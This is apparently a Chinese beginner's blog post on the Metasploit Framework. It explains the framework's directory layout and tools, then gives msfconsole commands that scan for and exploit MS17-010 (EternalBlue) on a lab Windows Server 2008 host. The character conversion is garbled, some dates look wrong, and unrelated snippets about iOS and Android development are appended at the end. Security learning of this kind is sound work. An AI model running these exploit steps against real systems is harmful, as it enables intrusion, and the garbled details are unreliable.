Metasploit Framewok的簡單使用

2021-10-03 03:53:43 字數 3085 閱讀 9887

幾乎每乙個玩滲透的人都會接觸到metasploit framework,簡稱msf。這是乙個滲透測試框架,用ruby語言寫的,該框架整合了很多可用的exploit,比如著名的ms08_067等。你可以在這個框架下進行一系列的滲透測試,利用現有的payload,如meterpreter等進一步拿取對方的shell

config --metasploit的環境配置資訊,資料庫配置資訊

data--後滲透模組的一些工具及payload,第三方小工具集合,使用者字典等資料資訊

db--rails編譯生成msf的web框架時的資料庫資訊

documentation--使用者說明文件及開發文件

external--metasploit的一些基礎擴充套件模組

libs--metasploit的一些基礎類和第三方模組類

log--msf執行時的一些系統資訊和其他資訊

modules--metasploit的系統工具模組,包括預輔助模組(auxiliary),滲透模組(exploits),攻擊荷載(payloads)和後滲透模組(posts),以及空欄位模組(nops)和編碼模組(encoders)

msfbinscan--對bin檔案進行檔案偏移位址掃瞄

msfcli--metasploit命令列模式,可以快速呼叫有效的payload進行攻擊,新版本的metasploit即將在2023年6月18日棄用

msfconsole--metasploit的基本命令列,整合了各種功能。

msfd--metasploit服務,非永續性服務

msfelfscan--對linux的elf檔案偏移位址進行掃瞄

msfencode--metasploit的編碼模組,可以對mepayload和shellcode進行編碼輸出

msfpayload--metasploit攻擊荷載,用以呼叫不同的攻擊荷載,生成和輸出不同格式的shellocode,新版本的metasploit即將在2023年6月18日棄用,用msfvenmon替代。

msfmachscan--功能同msfelfscan

msfpescan--對windows的pe格式檔案偏移位址進行掃瞄

msfrop--對windows的pe進行檔案位址偏移操作,可以繞過alsr等

msfrpc--metasploit的服務端,非永續性的rpc服務

msfrpcd--永續性的metasploit本地服務,可以給遠端使用者提供rpc服務以及其他的http服務,可以通過xml進行資料傳輸。

msfupdate--metasploit更新模組,可以用來更新metasploit模組

msfvenom--整合了msfpayload和msfencode的功能,效率更高,即將替代msf payload和msfencode

plugins--metasploit的第三方外掛程式介面

scripts--metasplit的常用後滲透模組,區別於data裡的後滲透模組,不需要加post引數和絕對路徑,可以直接執行

test--metasploit的基本測試目錄

tools--額外的小工具和第三方指令碼工具

檢視metasploit的基本資訊

這裡理解成kali的nc命令,基本一致

列出各種各樣的模組,後邊會經常使用

search

搜尋模組和漏洞的名稱,可以進行模糊匹配

這裡我以ms17_010漏洞(也就是著名的永恆之藍)來演示metasploit framewok的簡單使用方法

實驗環境:

攻擊機: kali

被攻擊的計算機:windows server 2008

我看到網上說要進行這個實驗要把被攻擊的計算機的防火牆關掉,我試了一下,發現關不關都能成功,也不知道為什麼。知道的可以給博主留下一下言。

msf >use auxiliary/scanner/smb/smb_ms17_010(載入掃瞄exp)

msf >set rhosts 192.168.11.160(設定被掃瞄ip)

msf >run(進行掃瞄,觀察是否存在該漏洞)

這裡表示存在此漏洞,可以進行攻擊

msf5> use exploit/windows/smb/ms17_010_eternalblue (使用攻擊模組)

msf5> set rhosts 192.168.11.160 (設定目標 ip)

msf5> run(開始攻擊)

show options 檢視當前模組的選項

show targets 顯示存在該漏洞的作業系統

從這裡我們可以看出存在這個漏洞的作業系統是windows 7和windows server 2008

作為乙個剛開始學metasploit framewok的小菜雞,還有很長的路要走啊。。。

UICollectionView的簡單使用

所屬controller要遵循三個協議 uicollectionviewdatasource,uicollectionviewdelegate,uicollectionviewdelegateflowlayout uicollectionviewflowlayout flowlayout uicol...

BGAQRCode Android的簡單使用

compile com.google.zxing core 3.2.1 xmlns android 這句是使用選擇器框架時用到的 xmlns tools package com.huaqiang.zxingdemo 選擇框架用到 android name android.permission.cam...

Android VideoView的簡單使用

mvideoview.setvideouri uri.parse android.resource getpackagename r.raw play 設定乙個 控制器 控制器預設在父布局的地步 可以自己實現控制器布局 mvideoview.setmediacontroller new mediac...